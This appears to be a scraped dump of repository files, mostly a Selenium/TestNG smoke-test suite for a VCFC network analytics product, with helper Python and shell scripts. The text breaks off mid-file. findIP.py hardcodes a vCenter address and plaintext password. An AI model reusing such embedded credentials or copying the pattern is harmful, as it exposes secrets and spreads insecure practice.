games.screen.add(new_fish)\n\n\n \n # create the shark\n the_shark = Shark(x = 50, y = 50)\n games.screen.add(the_shark)\n \n games.screen.mainloop()\n\n# kick it off!\nmain()\n\n \n"
}
] | 1 |
razvannorses/Python-3
|
https://github.com/razvannorses/Python-3
|
7766178b835355f9b1c90fa294787240d38f485c
|
d9e8043965fa066e3ed6017a9690648c66c2ac6d
|
2fbcecee9a7a6920b352017c3e456875d27ac581
|
refs/heads/master
| 2020-03-30T09:36:48.905258 | 2018-10-02T08:26:27 | 2018-10-02T08:26:27 | 151,083,056 | 0 | 0 | null | 2018-10-01T12:15:50 | 2018-10-01T14:36:37 | 2018-10-02T08:27:27 |
Python
|
[
{
"alpha_fraction": 0.6078431606292725,
"alphanum_fraction": 0.6470588445663452,
"avg_line_length": 5.866666793823242,
"blob_id": "303cb5c013aee068f3bf96f9e4c7a64219b0f20a",
"content_id": "77801085989f6220d3542421e627b6c62f05124b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 102,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 15,
"path": "/main.py",
"repo_name": "razvannorses/Python-3",
"src_encoding": "UTF-8",
"text": "a=5\nprint(a)\nb=7\n#print(a+b)\nc=15;\nprint(c)\nprint (type(c))\nprint (type(b))\nefgggjjj\n\ng\nfgfgfg\n\n\ntrtre"
}
] | 1 |
prangarajan21/VCFC-smoketest-master
|
https://github.com/prangarajan21/VCFC-smoketest-master
|
ba0a76663c97518b873a9b1fe33ee3de040cbf95
|
92ffd5040d00df9604d08251cc9a9e8fbbcf9854
|
586b09c473dd3abff3c78e158fe8255224905804
|
refs/heads/master
| 2020-05-20T17:11:59.021624 | 2017-09-20T15:29:38 | 2017-09-20T15:29:38 | 84,909,901 | 1 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7280553579330444,
"alphanum_fraction": 0.7340507507324219,
"avg_line_length": 31.68844223022461,
"blob_id": "625bebe78493408844dd598368fe1aba87c3b9e1",
"content_id": "382b6c23a683857142373445c27a8ca65ad217c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 6505,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 199,
"path": "/src/test/java/com/pluribus/vcf/pagefactory/VCFIaIndexPage.java",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "package com.pluribus.vcf.pagefactory;\nimport com.jcabi.log.Logger;\nimport com.pluribus.vcf.helper.PageInfra;\nimport java.net.MalformedURLException;\nimport java.net.URL;\nimport java.util.ArrayList;\nimport java.util.List;\n\nimport org.apache.commons.lang3.StringUtils;\nimport org.openqa.selenium.By;\nimport org.openqa.selenium.WebDriver;\nimport org.openqa.selenium.WebElement;\nimport org.openqa.selenium.support.FindBy;\nimport org.openqa.selenium.support.How;\nimport org.openqa.selenium.support.PageFactory;\nimport org.openqa.selenium.support.ui.ExpectedConditions;\nimport org.openqa.selenium.support.ui.WebDriverWait;\nimport com.pluribus.vcf.helper.PageInfra;\nimport org.openqa.selenium.WebDriver;\nimport org.openqa.selenium.WebElement;\nimport org.openqa.selenium.support.FindBy;\nimport org.openqa.selenium.support.How;\nimport org.openqa.selenium.support.PageFactory;\nimport org.openqa.selenium.support.ui.ExpectedConditions;\nimport org.openqa.selenium.support.ui.WebDriverWait;\nimport java.util.concurrent.TimeUnit;\nimport java.awt.Robot;\nimport java.awt.Toolkit;\nimport java.awt.datatransfer.StringSelection;\nimport java.awt.event.KeyEvent;\n\n\npublic class VCFIaIndexPage extends PageInfra {\n\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.ia-dashboard-menu\")\n\tWebElement dashboardIcon;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.ia-config-menu\")\n\tWebElement configIcon;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.ia-tag-menu\")\n\tWebElement tagIcon;\n\t\n\t@FindBy(how= How.CSS, using = \"button.btn.btn-sm.btn-primary\")\n\tWebElement addButton;\n\t\n\t@FindBy(how= How.CSS, using = \"a#taggingOptions.btn.btn-default.dropdown-toggle\")\n\tWebElement tagOptions;\n\t\n\t@FindBy(how = How.NAME, using = \"username\")\n\tWebElement userName;\n\t\n\t@FindBy(how = How.NAME, using = \"password\")\n\tWebElement password;\n\n\t@FindBy(how = How.NAME, using = \"ok\")\n\tWebElement okButton;\n\n\t@FindBy(how = How.CSS, using = \"div.metric-value.ng-binding\")\n\tWebElement countIcons;\n\t\n\t@FindBy(how = How.CSS, using = \"input[type = 'text']\")\n\tWebElement searchBox;\n\t\n\t@FindBy(how= How.CSS, using = \"button.btn.btn-primary\")\n\tWebElement confirmOkButton;\n\t\n\t\n\t@FindBy(how= How.CSS, using = \"span.switch\")\n\tWebElement spanSwitch;\n\t\n\t/* Field names used for webdriver findElement*/\n\tString iframeTag = \"iframe\";\n\tString switchListName = \"ul.dropdown-menu li\";\n\tString insightCountWidget = \"div.metric-value.ng-binding\";\n\tString inputTagName = \"input\";\n\tString srchString = \"a[title=\";\t\n\tString uploadTagStr = \"Upload Tags\";\n\tString clearTagStr = \"Clear Tags\";\n\tString fileUpload = \"div.holder\"; \n\tString countIconsId = \"div.metric-value.ng-binding\";\n\t\n\t\n\tpublic VCFIaIndexPage(WebDriver driver) {\n\t\tsuper(driver);\n\t}\n\t\n\tpublic void applySearchFilter(String searchString) {\n\t\twaitForElementVisibility(searchBox,100);\n\t\tsetValue(searchBox,searchString);\n\t\tdriver.manage().timeouts().implicitlyWait(0, TimeUnit.MILLISECONDS);\n\t\tboolean existsOn = false;\n\t\texistsOn = (driver.findElements(By.cssSelector(srchString+\"'\"+searchString+\"'\")).size() != 0);\n\t\tdriver.manage().timeouts().implicitlyWait(100, TimeUnit.SECONDS);\n\t\tif(existsOn) {\n\t\t\tdriver.findElement(By.cssSelector(srchString+\"'\"+searchString+\"'\")).click();\n\t\t}\n\t}\n\t\n\tpublic List<WebElement> getInsightCount() {\n\t\tList<WebElement> rows = new ArrayList();\n\t\tdashboardIcon.click();\n\t\twaitForElementVisibility(driver.findElement(By.tagName(iframeTag)),1000);\n\t\tdriver.switchTo().frame(driver.findElement(By.tagName(iframeTag)));\t\n\t\t//retryingFindClick(By.cssSelector(countIconsId));\n\t\twaitForElementVisibility(countIcons,120);\n\t\trows = driver.findElements(By.cssSelector(insightCountWidget));\n\t\treturn rows;\n\t}\n\t\n\tpublic int getConnectionCount() {\n\t\tint connCount = 0;\n\t\tList <WebElement> rows = getInsightCount();\n\t\t\tif(!rows.isEmpty()) {\n\t\t\t\tString connOutput = rows.get(0).getText();\n\t\t\t\tif(StringUtils.contains(connOutput, ',')) {\n\t\t\t\t\tconnOutput = StringUtils.remove(connOutput, ',');\n\t\t\t\t}\n\t\t\t\tif(connOutput.equals(\"\")) {\n\t\t\t\t\tconnCount = 0;\n\t\t\t\t} else {\n\t\t\t\t\tconnCount = Integer.parseInt(connOutput);\n\t\t\t\t}\n\t\t\t}\n\t\t\tdriver.switchTo().defaultContent();\n\t\treturn connCount;\n\t}\n\t\n\tpublic int getAppCount() {\n\t\tint connCount = 0;\n\t\tList <WebElement> rows = getInsightCount();\n\t\t\tif(!rows.isEmpty()) {\n\t\t\t\tString connOutput = rows.get(1).getText();\t\n\t\t\t\tif(StringUtils.contains(connOutput, ',')) {\n\t\t\t\t\tconnOutput = StringUtils.remove(connOutput, ',');\n\t\t\t\t} \n\t\t\t\tif(connOutput.equals(\"\")) {\n\t\t\t\t\tconnCount = 0;\n\t\t\t\t} else {\n\t\t\t\t\tconnCount = Integer.parseInt(connOutput);\n\t\t\t\t}\n\t\t\t}\n\t\t\tdriver.switchTo().defaultContent();\t\n\t\treturn connCount;\n\t}\n\t\n\t\n\tpublic void gotoIADashboard() {\n\t\tdashboardIcon.click();\n\t\twaitForElementVisibility(driver.findElement(By.tagName(iframeTag)),1000);\n\t}\n\t\t\n\tpublic static void setClipboardData(String string) {\n\t\t//StringSelection is a class that can be used for copy and paste operations.\n\t\tStringSelection stringSelection = new StringSelection(string);\n\t\tToolkit.getDefaultToolkit().getSystemClipboard().setContents(stringSelection, null);\n\t}\n\t\n\tpublic void uploadTag(String fileLocation) throws Exception{\n\t\ttagIcon.click();\n\t\twaitForElementVisibility(tagOptions,100);\n\t\ttagOptions.click();\n\t\tWebElement uploadTags = findAnchorTags(uploadTagStr);\n\t\tuploadTags.click();\n\t\twaitForElementVisibility(driver.findElement(By.cssSelector(fileUpload)),100);\n\t\tWebElement element = driver.findElement(By.cssSelector(fileUpload));\n\t\telement.click(); //Click on fileUpload\n\t\tsetClipboardData(fileLocation);\n\t\t Robot robot = new Robot();\n\t\t robot.keyPress(KeyEvent.VK_CONTROL);\n robot.keyPress(KeyEvent.VK_V);\n robot.keyRelease(KeyEvent.VK_V);\n robot.keyRelease(KeyEvent.VK_CONTROL);\n robot.keyPress(KeyEvent.VK_ENTER);\n robot.keyRelease(KeyEvent.VK_ENTER);\n \n WebDriverWait myWaitVar = new WebDriverWait(driver,1000);\n\t\t myWaitVar.until(ExpectedConditions.elementToBeClickable(okButton));\n\t\t waitForElementVisibility(okButton,100);\n\t\t// To click on the submit button (Not the browse button)\n\t\t okButton.click();\n\t\t//String checkText = driver.findElement(By.id(\"message\")).getText();\n\t\t//Assert.assertEquals(\"File uploaded successfully\", checkText);\t\n\t}\n\t\n\t\n\tpublic WebElement findAnchorTags(String anchorText) {\n\t\tList <WebElement> anchorTags = driver.findElements(By.cssSelector(\"a\"));\n\t\tWebElement returnRow = null;\n\t\tfor (WebElement row:anchorTags) {\n\t\t\tif(row.getText().equalsIgnoreCase(anchorText)) {\n\t\t\t\treturnRow = row;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\treturn returnRow;\n\t}\n\t\n}\n"
},
{
"alpha_fraction": 0.7420316934585571,
"alphanum_fraction": 0.7448275685310364,
"avg_line_length": 35.74657440185547,
"blob_id": "bc403f089cbd3293d0f17887ba25c6c03b90f7e1",
"content_id": "f03e92e08aeae987381182706eda4db5f8093abd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 5365,
"license_type": "no_license",
"max_line_length": 169,
"num_lines": 146,
"path": "/src/test/java/com/pluribus/vcf/test/IATest.java",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "package com.pluribus.vcf.test;\nimport com.pluribus.vcf.helper.TestSetup;\nimport com.jcabi.ssh.Shell;\nimport com.pluribus.vcf.helper.IperfSetup;\nimport com.pluribus.vcf.helper.SwitchMethods;\nimport com.pluribus.vcf.helper.PageInfra;\nimport com.pluribus.vcf.pagefactory.VCFLoginPage;\nimport com.pluribus.vcf.pagefactory.VCFHomePage;\nimport com.pluribus.vcf.pagefactory.VCFIaIndexPage;\nimport org.testng.annotations.BeforeClass;\nimport org.testng.annotations.BeforeTest;\nimport org.testng.annotations.Optional;\nimport org.testng.annotations.Test;\nimport org.testng.annotations.Parameters;\nimport java.io.BufferedReader;\nimport java.io.BufferedWriter;\nimport java.io.FileNotFoundException;\nimport java.io.FileOutputStream;\nimport java.io.FileReader;\nimport java.io.FileWriter;\nimport java.io.InputStreamReader;\nimport java.io.OutputStreamWriter;\nimport java.io.Writer;\n\npublic class IATest extends TestSetup {\n\tprivate VCFHomePage home1;\n\tprivate VCFIaIndexPage iaIndex;\n\tprivate VCFLoginPage login;\n\tprivate IperfSetup perf;\n\tprivate SwitchMethods cli;\n\tprivate String user = \"network-admin\";\n\tprivate String passwd = \"test123\";\n\t\n\t@Parameters({\"clientIp\",\"serverIp\",\"mgmtIp\"})\n\t@BeforeClass(alwaysRun = true)\n\tpublic void init(String clientIp, String serverIp, String mgmtIp) {\n\t\tcli = new SwitchMethods(mgmtIp);\n\t\t//cli.restartTomcat();//Workaround for bug 15007\n\t\tlogin = new VCFLoginPage(getDriver());\n\t\thome1 = new VCFHomePage(getDriver());\n\t\tiaIndex = new VCFIaIndexPage(getDriver());\n\t\tperf = new IperfSetup(clientIp,serverIp);\n\t}\n\t\n\t@Parameters({\"password\"}) \n\t@Test(alwaysRun = true)\n\tpublic void logintoIA(@Optional(\"test123\") String password) {\n\t\tlogin.login(\"admin\", password);\n\t\thome1.gotoIA();\n\t}\n\t\n\t@Parameters({\"vcfIp\",\"switchName\",\"trafficDestIp\",\"trafficSrcIp\",\"trafficNumSessions\",\"trafficInterval\"}) \n\t@Test(groups={\"smoke\",\"regression\"},dependsOnMethods={\"logintoIA\"},description=\"Send traffic and verify stats\")\n\tpublic void simpleTrafficTest(String vcfIp, String switchName, String trafficDestIp, String trafficSrcIp, int trafficNumSessions, int trafficInterval) throws Exception{\n\t\t// Clearing switch before test\n\t\tcli.clearSessions();\n\t\t\n\t\t// Iperf setup \n\t\tperf.startServer();\n\t\tperf.sendTraffic(trafficNumSessions, trafficInterval, trafficDestIp);\n\t\t\n\t\t//Verify on switch first\n\t\tint connCount = cli.getConnectionCount(trafficDestIp);\n\t\tif(connCount == trafficNumSessions) {\n\t\t\tprintLogs(\"info\",\"simpleTrafficTest\",\"Connection count test passed on switch\"+switchName);\n\t\t} else {\n\t\t\tprintLogs(\"error\",\"simpleTrafficTest\",\"Connection count test failed on switch\"+switchName);\n\t\t}\n\t\t\n\t\t//Verify on elastic search CLI \t\n\t\tProcess p = Runtime.getRuntime().exec(\"src/test/resources/es_script.expect \"+vcfIp);\n\t\tp.waitFor();\n\t\tStringBuffer output = new StringBuffer();\n\t\tBufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream())); \n\t\tString line = \"\"; \n\t\twhile ((line = reader.readLine())!= null) { \n\t\t\toutput.append(line + \"\\n\"); \n\t\t\t} \n\t\tprintLogs(\"info\",\"elasticSearchVerification\",output.toString());\n\t\n\t\tboolean status = false;\n\t\tiaIndex.gotoIADashboard();\n\t\t// Verify on VCFC \n\t\tstatus = verifyVCFCount(trafficNumSessions);\n\t\tif(status == true) {\n\t\t\tprintLogs(\"info\",\"simpleTrafficTest\",\"VCFC count verification passed\");\n\t\t} else {\n\t\t\tprintLogs(\"error\",\"simpleTrafficTest\",\"VCFC count verification failed\");\t\t\t\n\t\t}\n\t\t\n\t\t//Apply search filter for srcIp\n\t\tiaIndex.applySearchFilter(\"dstIp: \"+trafficDestIp);\n\t\tstatus = verifyVCFCount(trafficNumSessions);\n\t\tif(status == true) {\n\t\t\tprintLogs(\"info\",\"simpleTrafficTest\",\"VCFC count verification after applying dstIp filter passed\");\n\t\t} else {\n\t\t\tprintLogs(\"error\",\"simpleTrafficTest\",\"VCFC count verification after applying dstIP filter failed\");\t\t\t\n\t\t}\n\t\t\n\t\t//Apply search filter for srcIp\n\t\tiaIndex.applySearchFilter(\"srcIp: \"+trafficSrcIp);\n\t\tstatus = verifyVCFCount(trafficNumSessions);\n\t\tif(status == true) {\n\t\t\tprintLogs(\"info\",\"simpleTrafficTest\",\"VCFC count verification after applying srcIp filter passed\");\n\t\t} else {\n\t\t\tprintLogs(\"error\",\"simpleTrafficTest\",\"VCFC count verification after applying srcIP filter failed\");\t\t\t\n\t\t}\n\t\tif(status == false) {\n\t\t\tthrow new Exception(\" Simple traffic test failed\");\n\t\t}\n\t}\n\t\n\t/*\n\t@Test(groups={\"smoke\",\"regression\"},dependsOnMethods={\"addCollectorTest\"},description=\"Tagging test\")\n\tpublic void tagTest() throws Exception{\n\t\tString fileLoc = \"C:\\\\Desktop\\\\srcIp.csv\";\n\t\twriteToFile(fileLoc,\"item_srcip,item_dstip,Owner,Device,Group,Function,Name,Security_List\\n4.4.4.129,,,,,,,\");\n\t\tiaIndex.uploadTag(fileLoc);\n\t}\n\t\n\t@Test(groups={\"smoke\",\"regression\"},dependsOnMethods={\"tagTest\"},description=\"Logout of VCFC\")\n\tpublic void logout() {\n\t\tlogin.logout();\n\t}\n\t*/\n\tpublic boolean verifyVCFCount(int trafficNumSessions) {\n\t\tboolean status = true;\n\t\tint vcfcConnCount = iaIndex.getConnectionCount();\n\t\tcom.jcabi.log.Logger.info(\"verifyVCFCCount\",\"vcfcConnCount:\"+vcfcConnCount);\n\t\tint vcfcAppCount = iaIndex.getAppCount();\n\t\tprintLogs(\"info\",\"verifyVCFCCount\",\"vcfcAppCount:\"+vcfcAppCount);\n\n\t\tif (vcfcConnCount != trafficNumSessions) {\n\t\t\tprintLogs(\"error\",\"verifyVCFCCount\",\"vcfcConnCount:\"+vcfcConnCount+\"expected:\"+trafficNumSessions);\n\t\t\tstatus = false;\n\t\t} \n\t\tif (vcfcAppCount != 1) {\n\t\t\tprintLogs(\"error\",\"verifyVCFCCount\",\"vcfcAppCount:\"+vcfcAppCount);\n\t\t\tstatus = false;\n\t\t}\n\t\t\n\t\treturn status;\n\t}\n\t\n\t\n}\n"
},
{
"alpha_fraction": 0.6702820062637329,
"alphanum_fraction": 0.7093275785446167,
"avg_line_length": 24.61111068725586,
"blob_id": "228af1cc5922fdc627d3c6628cee1e5275108c73",
"content_id": "3e616cf6a47e86b6d38a327bd16b95fa7ee832b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 461,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 18,
"path": "/findIP.py",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "import sys,ssl\nfrom pprint import pprint\nfrom pysphere import VIServer\n\nserver = VIServer()\nVCENTER_IP=\"10.9.34.204\"\nVCENTER_USER=\"[email protected]\"\nVCENTER_PASS=\"MyTest-456\"\n\n#ova_name=\"VCFC-2.2.0-jenkins-3108\"\nova_name=sys.argv[1]\n\nserver.connect(VCENTER_IP,VCENTER_USER,VCENTER_PASS)\n\nvm = server.get_vm_by_name(ova_name)\nnet_info = vm.get_property('net',False)\nvcfc_ip=[ x['ip_addresses'][0] for x in net_info if x['network'] == 'VM Network' ][0]\nprint vcfc_ip\n"
},
{
"alpha_fraction": 0.7046263217926025,
"alphanum_fraction": 0.7233096361160278,
"avg_line_length": 43.959999084472656,
"blob_id": "8a7a0381b1cae3f595ac0a26c5109229f1ab9693",
"content_id": "d6d9d70f873278d4ef9bf581e2a95d0ff538652a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1124,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 25,
"path": "/README.md",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "VCFC testsuite\n\nMandatory parameters \n - in testng.xml file\n <parameter name=\"switchName\" value=\"leo-vcf-3\"></parameter>\n <parameter name=\"mgmtIp\" value=\"10.9.21.50\"></parameter>\n <parameter name=\"dataNodeHost\" value=\"10.9.8.85\"></parameter>\n - through command line\n vcfIp: This is the IP of the VCF instance\n browser: Browser to run test on\n\nOptional attributes:\n\t1. This is required if a different password (not the default is desired for test purposes) for your VCF instance\n\t<parameter name = \"password\" value=\"value_to_be_set_for_vcfc_instance\"></parameter>\n\t2. To use your browserstack credentials:\n <parameter name= \"bsUserId\" value=\"BS_uid\"></parameter>\n <parameter name= \"bsKey\", value=\"BS_Key\"></parameter>\n\t3. If this value is set to 0 (default is 1), then the VCFC session will not be cleaned up and test will start in the existing system\n <parameter name= \"cleanBeforeTest\", value=0/1></parameter>\n\nHow to invoke:\nRun shell script in directory (OR)\nmvn -Dvcfp=IP_addr -Dbrowser=Chrome/Firefox/IE -Dgroups=Smoke clean install\n# VCFC-smoketest-master\n# VCFC-smoketest-master\n"
},
{
"alpha_fraction": 0.6143791079521179,
"alphanum_fraction": 0.6470588445663452,
"avg_line_length": 24.5,
"blob_id": "a3a7cfb6fcbc2d93e50236c4e4f56de644ef792f",
"content_id": "81f760c0bbb927e4d1ec5d2a2ee3c477108118c1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 153,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 6,
"path": "/src/test/resources/start_server.sh",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nHOST=$1\nUSERNAME=$2\nPASSWORD=$3\n\n/usr/local/bin/sshpass -p ${PASSWORD} ssh ${USERNAME}@${HOST} \"nohup /usr/bin/iperf -s -D > /dev/null 2>&1\"\n"
},
{
"alpha_fraction": 0.6016949415206909,
"alphanum_fraction": 0.6069100499153137,
"avg_line_length": 30.094594955444336,
"blob_id": "3a12ad8e7b80529004b39d0081c2920ab34ffac0",
"content_id": "5978761dd496c7674ddf2ce30fbb449ff5017526",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 4602,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 148,
"path": "/src/test/java/com/pluribus/vcf/helper/PageInfra.java",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "package com.pluribus.vcf.helper;\n\nimport java.util.ResourceBundle;\nimport java.util.concurrent.TimeUnit;\nimport java.util.List;\nimport org.openqa.selenium.By;\nimport org.openqa.selenium.Keys;\nimport org.openqa.selenium.WebDriver;\nimport org.openqa.selenium.WebElement;\nimport org.openqa.selenium.interactions.Actions;\nimport org.openqa.selenium.support.PageFactory;\nimport org.openqa.selenium.support.ui.ExpectedCondition;\nimport org.openqa.selenium.support.ui.ExpectedConditions;\nimport org.openqa.selenium.support.ui.Select;\nimport org.openqa.selenium.support.ui.WebDriverWait;\n\npublic class PageInfra {\n protected WebDriver driver;\n protected ResourceBundle rb;\n protected Select select;\n\n\n public PageInfra(WebDriver driver) {\n PageFactory.initElements(driver, this);\n this.driver = driver;\n }\n\n public void setValue(WebElement field, String strUserName) {\n field.clear();\n field.sendKeys(strUserName);\n }\n\n public void setValue(WebElement field, String value, Keys key) {\n field.clear();\n field.sendKeys(value, key);\n } \n \n public void selectElement(WebElement field, String value) {\n \tSelect mySelect= new Select(field);\n \tList<WebElement> options = mySelect.getOptions();\n \tfor (WebElement option : options) {\n \t if (option.getText().equalsIgnoreCase(value)) {\n \t option.click();\n \t }\n \t}\n }\n public void moveToElements(WebElement field,WebElement field2) {\n Actions builder = new Actions(driver);\n waitForElementVisibility(field, 50);\n builder.moveToElement(field).moveToElement(field2).build().perform();\n }\n \n public void clickOnElements(WebElement field,WebElement field2) {\n Actions builder = new Actions(driver);\n waitForElementVisibility(field, 50);\n builder.moveToElement(field).click(field2).build().perform();\n }\n \n public void waitForElementPresent(By locator) {\n WebElement el\n = (new WebDriverWait(driver, 10))\n .until(ExpectedConditions.presenceOfElementLocated(locator));\n }\n\n public Boolean waitForElementStaleUp(WebElement el, int time) {\n return (new WebDriverWait(driver, time)).until(ExpectedConditions.stalenessOf(el));\n }\n\n public WebElement waitForElementVisibility(WebElement el, int time) {\n return (new WebDriverWait(driver, time))\n .until(ExpectedConditions.visibilityOf(el));\n }\n\n public WebElement waitForElementVisibility(WebElement el) {\n return (new WebDriverWait(driver, 15))\n .until(ExpectedConditions.visibilityOf(el));\n }\n\n public WebElement waitForElementToClick(final By locator,int waitTime) {\n return (new WebDriverWait(driver, waitTime))\n .until(ExpectedConditions.elementToBeClickable(locator));\n }\n \n public boolean retryingFindClick(By by) {\n \t boolean result = false;\n int attempts = 0;\n while(attempts < 10) {\n try {\n \t boolean exists = (driver.findElements(by)).size() != 0;\n \t if(exists) {\n \t\t result = true;\n \t\t break;\n \t } else {\n \t\t //WebDriver wait = new WebDriverWait(driver,30);\n \t }\n } catch(Exception e) {\n }\n attempts++;\n }\n return result;\n }\n \n public boolean retryingFindClick (WebElement el) {\n \tboolean result = false;\n \tint attempts = 0;\n while(attempts < 10) {\n \ttry {\n \t\tel.click();\n \t\tresult = true;\n \t\tbreak;\n \t} catch (Exception e) {\n \t}\n \tattempts++;\n }\n return result;\n }\n \n public boolean retryingFindClick(WebElement el, By by) {\n boolean result = false;\n int attempts = 0;\n while(attempts < 10) {\n try {\n \t\tel.findElement(by).click();\n result = true;\n break;\n } catch(Exception e) {\n }\n attempts++;\n }\n return result;\n }\n \n public ExpectedCondition<WebElement> visibilityOfElementLocated(final By locator) {\n return new ExpectedCondition<WebElement>() {\n public WebElement apply(WebDriver driver) {\n WebElement toReturn = driver.findElement(locator);\n if (toReturn.isDisplayed()) {\n return toReturn;\n }\n return null;\n }\n };\n }\n\n public ResourceBundle getBundle() {\n return rb;\n }\n}\n"
},
{
"alpha_fraction": 0.692819356918335,
"alphanum_fraction": 0.7061231732368469,
"avg_line_length": 31.214284896850586,
"blob_id": "2f970f818d768c4668da9967a12b73dc5218acd5",
"content_id": "fb6abb81bc331ab82b3cc3d498a4ed891e4c52a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 17589,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 546,
"path": "/src/test/java/com/pluribus/vcf/pagefactory/VcfSettingsPage.java",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "package com.pluribus.vcf.pagefactory;\n\nimport com.pluribus.vcf.helper.PageInfra;\nimport java.net.MalformedURLException;\nimport java.net.URL;\nimport java.util.ArrayList;\nimport java.util.List;\nimport java.util.concurrent.TimeUnit;\n\nimport org.openqa.selenium.By;\nimport org.openqa.selenium.WebDriver;\nimport org.openqa.selenium.WebElement;\nimport org.openqa.selenium.interactions.Actions;\nimport org.openqa.selenium.support.FindBy;\nimport org.openqa.selenium.support.How;\nimport org.openqa.selenium.support.PageFactory;\nimport org.openqa.selenium.support.ui.ExpectedConditions;\nimport org.openqa.selenium.support.ui.WebDriverWait;\n\npublic class VcfSettingsPage extends PageInfra{\n\t/* Settings toolbar */\t\n\t@FindBy(how = How.XPATH, using = \".//a[contains(@href,'/vcf-center/license')]\")\n\tWebElement licenseTab;\n\n\t@FindBy(how = How.XPATH, using = \".//a[contains(@href,'/vcf-center/datanode')]\")\n\tWebElement dataNodeTab;\n\n\t@FindBy(how = How.XPATH, using = \".//a[contains(@href,'/vcf-center/collector')]\")\n\tWebElement collectorMgmtTab;\n\n\t@FindBy(how = How.CSS, using = \"span.fa-stack-1x.pnc-text\")\n\tWebElement pncCloudbutton;\n\t\n\t@FindBy(how = How.ID, using = \"username\")\n\tWebElement username;\n\t\n\t@FindBy(how = How.NAME, using = \"name\")\n\tWebElement name;\n\t\n\t@FindBy(how = How.ID, using = \"password\")\n\tWebElement password;\n\t\n\t@FindBy(how = How.NAME, using = \"ok\")\n\tWebElement okButton;\n\t\n\t@FindBy(how = How.NAME, using = \"cancel\")\n\tWebElement cancelButton;\n\t\n\t@FindBy(how = How.CSS, using = \"button.btn.btn-sm.btn-primary\")\n\tWebElement addButton;\n\t\n\t@FindBy(how = How.ID, using = \"name\")\n\tWebElement nodeName;\n\t\n\t@FindBy(how = How.ID, using = \"host\")\n\tWebElement nodeHost;\n\t\n\t@FindBy(how = How.NAME, using = \"sudo\")\n\tWebElement sudo;\n\t\n\t@FindBy(how = How.ID, using = \"heapsize\")\n\tWebElement heapsize;\n\t\n\t@FindBy(how = How.ID, using = \"mgmt-ip\")\n\tWebElement mgmtIp;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.config-menu\")\n\tWebElement switchMenu;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.health-menu\")\n\tWebElement healthMenu;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.server-menu\")\n\tWebElement serverMenu;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.apps-menu\")\n\tWebElement appsMenu;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.certs-menu\")\n\tWebElement certsMenu;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.admin-menu\")\n\tWebElement adminMenu;\n\t\n\t@FindBy(how = How.CSS, using = \"a.fa.fa-cogs\")\n\tWebElement vcfSettingsIcon;\n\t\n\t@FindBy(how = How.CSS, using = \"a.fa.fa-home\")\n\tWebElement vcfHomeIcon;\n\t\n\t@FindBy(how = How.CSS, using = \"a.fa.fa-sign-out\")\n\tWebElement vcfLogout;\n\t\t\n\t@FindBy(how = How.CSS, using = \"button.btn.btn-primary.btn-xs\")\n\tWebElement AddAuthServer;\n\t\n\t@FindBy(how = How.CSS, using = \"button.btn.btn-default.btn-sm\")\n\tWebElement dropDown;\n\t\n\t@FindBy(how = How.NAME, using = \"baseDn\")\n\tWebElement baseDn;\n\t\n\t@FindBy(how = How.ID, using = \"ldapManagerDn\")\n\tWebElement ldapManagerDn;\n\t\n\t@FindBy(how = How.NAME, using = \"ldapManagerPass\")\n\tWebElement ldapManagerPass;\n\t\n\t@FindBy(how = How.NAME, using = \"ldapUserDnPatterns\")\n\tWebElement ldapUserDnPatterns;\n\t\n\t@FindBy(how = How.NAME, using = \"ldapUserSearchFilter\")\n\tWebElement ldapUserSearchFilter;\n\t\n\t@FindBy(how = How.CSS, using = \"div.td\")\n\tWebElement switchList;\n\t\n\t@FindBy(how = How.CSS, using = \"div.stats.ng-scope\")\n\tWebElement switchStats;\n\t\n\t@FindBy(how = How.CSS, using = \"div [ui-view]\")\n\tWebElement healthDetail;\n\t\n\t@FindBy(how = How.CSS, using = \"div#tr_cert_0\")\n\tWebElement certsDetail;\n\t\n\t@FindBy(how = How.CSS, using = \"div#tr_apps_0\")\n\tWebElement appsDetail;\n\t\n\t@FindBy(how = How.CSS, using = \"button.btn.btn-primary.btn-xs\")\n\tWebElement addAdmin;\n\t\n\t@FindBy(how = How.CSS, using = \"ng-transclude\")\n\tWebElement listLicense;\n\t\n\t@FindBy(how= How.CSS, using = \"button.btn.btn-default.btn-sm\")\n\tWebElement 